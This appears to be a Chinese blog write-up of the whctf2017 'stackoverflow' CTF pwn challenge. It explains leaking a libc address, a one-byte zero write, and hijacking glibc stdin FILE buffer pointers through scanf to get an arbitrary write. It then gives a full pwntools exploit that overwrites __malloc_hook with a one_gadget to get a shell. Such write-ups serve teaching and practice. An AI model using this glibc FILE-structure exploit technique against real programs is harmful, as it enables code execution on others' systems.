whctf2017_stackoverflow
前几天做的一道题几乎都是看zikh26师傅的文章写的,自己太菜,源码也才开始看
保护策略
漏洞分析
可以泄露我们想要的地址,还有一个可以任意地址写一个0的机会
思路
1、利用%s没有截断就一直输出的效果得到一个libc地址
2、有一个置零的机会,又因为再次输入v1时不会改变v2的值,达到任意地址写一个0,
3、有IO_gets()函数,可以不断执行来刷新指针_io_read_ptr 加一,实现fp->_IO_read_ptr =fp->_IO_read_end 从fp->_IO_buf_base读数据
scanf的调用流程为scanf->vfscanf->__uflow->_IO_default_uflow()-
>underflow->_IO_file_underflow()
最后也是调用read,实现任意写的的一个关键代码是
count = _IO_SYSREAD(fp, fp->_IO_buf_base, fp->_IO_buf_end -
fp->_IO_buf_base);
需要绕过一个保护
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *)fp->_IO_read_ptr;
exp
from tools import *
context.log_level='debug'
p,e,libc=load("a")
p.sendafter("leave your name, bro:","a"*0x20)
libc_base=recv_libc()-libc.sym['_IO_2_1_stdout_']
log_addr('libc_base')
malloc_hook=libc_base+libc.symbols['__malloc_hook']
p.sendlineafter("please input the size to trigger stackoverflow: ",str(0x5c5908))
p.sendlineafter("please input the size to trigger stackoverflow: ",str(0x200000))
p.sendlineafter("padding and ropchain: ","b"*0x10)
debug(p,0x400A45,0x4008FF)
p.sendafter("please input the size to trigger stackoverflow: ",b'a'*8+b'b'*8+b'c'*8+p64(malloc_hook)+p64(malloc_hook+0x8))
p.sendlineafter("padding and ropchain: ",p64(0xdeadbeef))
for i in range(39):
p.sendlineafter("please input the size to trigger stackoverflow: ",'1')
p.sendlineafter("please input the size to trigger stackoverflow: ",p64(search_og(3)+libc_base))
p.interactive()
参考
whctf2017 pwn题wp | ZIKH26's Blog
标签:fp,libc,read,base,whctf2017,IO,stackoverflow From: https://www.cnblogs.com/trunk/p/16997332.html